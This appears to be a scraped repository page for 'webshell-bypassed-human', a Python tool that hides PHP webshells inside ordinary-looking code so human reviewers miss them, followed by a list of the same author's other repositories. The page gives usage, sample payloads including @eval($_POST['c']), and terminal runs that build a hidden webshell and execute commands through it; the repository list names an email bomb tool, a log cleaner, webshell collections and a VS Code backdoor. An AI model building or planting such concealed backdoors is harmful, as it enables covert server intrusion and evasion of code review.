• Stars
    star
    231
  • Rank 173,434 (Top 4 %)
  • Language
    PHP
  • License
    Apache License 2.0
  • Created over 4 years ago
  • Updated almost 3 years ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

过人 webshell 的生成工具

webshell-bypassed-human

见公众号文章:传送门 ,或者见 fb 文章 https://www.freebuf.com/articles/web/241454.html

过人 webshell 的生成工具

» python hide_webshell.py
usage: hide_webshell.py [-h] -pf PAYLOAD_FILE [--pro] [-wf WEBSHELL_FILE]
                        [--debug]
                        php
hide_webshell.py: error: the following arguments are required: php, -pf/--payload_file

将 payload 放在 -pf 所指定的路径

hide webshell

示例:

python hide_webshell.py hide_webshell.py normal.php -pf payload.txt

hide webshell pro

示例:

python hide_webshell.py normal_pro.php -pf payload.txt --pro

payload 示例

  • system("echo \"hacked by Tr0y :)\"");
  • @eval($_POST["c"]);

完整示例

# macr0phag3 in ~/Tr0y/webshell-bypassed-human on git:master ✖︎ [14:45:27]
» cat payload.txt
system("echo \"hacked by Tr0y :)\"");%

# macr0phag3 in ~/Tr0y/webshell-bypassed-human on git:master ✖︎ [14:45:28]
» p hide_webshell.py normal.php -pf payload.txt && php webshell_hidden.php
[+] Hide webshell in normal mode
  [-] Get payload from payload.txt
      Payload is system("echo \"hacked by Tr0y :)\"");
  [-] Get php code from normal.php
[!] Saved webshell as webshell_hidden.php
[!] All done

Bye :)
hacked by Tr0y :)

# macr0phag3 in ~/Tr0y/webshell-bypassed-human on git:master ✖︎ [14:45:31]
» p hide_webshell.py normal_pro.php -pf payload.txt --pro && php webshell_hidden.php
[+] Hide webshell in pro mode
  [-] Get payload from payload.txt
      Payload is system("echo \"hacked by Tr0y :)\"");
  [-] Get php code from normal_pro.php
[!] Saved webshell as webshell_hidden.php
[!] All done

Bye :)
hacked by Tr0y :)

# macr0phag3 in ~/Tr0y/webshell-bypassed-human on git:master ✖︎ [14:48:23]
» cat payload.txt
@eval($_POST["c"]);%

# macr0phag3 in ~/Tr0y/webshell-bypassed-human on git:master ✖︎ [14:48:24]
» p hide_webshell.py normal.php -pf payload.txt && php -r '$_POST["c"]="system(\"id\");"; require("webshell_hidden.php");'
[+] Hide webshell in normal mode
  [-] Get payload from payload.txt
      Payload is @eval($_POST["c"]);
  [-] Get php code from normal.php
[!] Saved webshell as webshell_hidden.php
[!] All done

Bye :)
uid=502(macr0phag3) gid=20(staff) groups=20(staff),12(everyone), ...此处省略

# macr0phag3 in ~/Tr0y/webshell-bypassed-human on git:master ✖︎ [14:48:26]
» p hide_webshell.py normal_pro.php -pf payload.txt --pro && php -r '$_POST["c"]="system(\"id\");"; require("webshell_hidden.php");'
[+] Hide webshell in pro mode
  [-] Get payload from payload.txt
      Payload is @eval($_POST["c"]);
  [-] Get php code from normal_pro.php
[!] Saved webshell as webshell_hidden.php
[!] All done

Bye :)
uid=502(macr0phag3) gid=20(staff) groups=20(staff),12(everyone), ...此处省略

其他

Stargazers over time

More Repositories

1

GithubMonitor

根据关键字与 hosts 生成的关键词,利用 github 提供的 api,监控 git 泄漏。
Python
307
star
2

email_hack

A email bomb/fake email tool, by Python
Python
286
star
3

Sniffer

A Sniffer for Open-WLAN
Python
116
star
4

ja3box

extract ja3(s) when sniffing or from a pcap.
Python
94
star
5

WebShells

Some cool WebShells
PHP
59
star
6

MoMo

利用墨墨背单词的分享功能拿每日20个的单词上限奖励(多线程
Python
45
star
7

LLC

Linux Log Cleaner (utmp, wtmp, btmp, lastlog)
Python
27
star
8

Zero-Width-Spaces-Hiden

Hide information using Unicode(Zero-Width-Spaces).
Python
25
star
9

dibber

用于自动搜索 Python 沙箱逃逸、SSTI 攻击链的小工具
Python
18
star
10

EyesSaver

无界面、自启动的番茄钟,拯救眼睛 👀
Shell
15
star
11

ShuWo_Spider

图书馆书蜗App自动化脚本(抢坐 & 续借)
Python
15
star
12

xsleaks-wiki-zh_CN

xsleaks-wiki 中文版
HTML
13
star
13

souse

A tool for converting Python source code to opcode(pickle)
Python
11
star
14

ReIPDog

用 Python 写的一个查询旁站的脚本
Python
8
star
15

Cryptography_Experiments

Experiments for my cryptography course. (include all codes).
Python
6
star
16

Exp-or-Poc

My Exp or Poc
Python
6
star
17

vscode-door

利用 vscode 配置制作后门
Python
3
star
18

My-Alfred-Workflows

My Alfred Workflows ~
2
star
19

Macr0phag3.github.io

My Blog: www.tr0y.wang
HTML
2
star
20

Fractal_Tree

Draw a fractal tree by python
Python
2
star
21

Macr0phag3

I, Macr0phag3
2
star
22

autoEvaluations4Teacher

用 Python 写的一个教务处自动评教脚本
Python
1
star
23

for-my-wechat-public-platform

公众号,橘子杀手 的一些文件托管
PHP
1
star
24

parselmouth

自动化的 Python 沙箱逃逸 payload bypass 框架 / Automated Python Sandbox Escape Payload Bypass Framework
1
star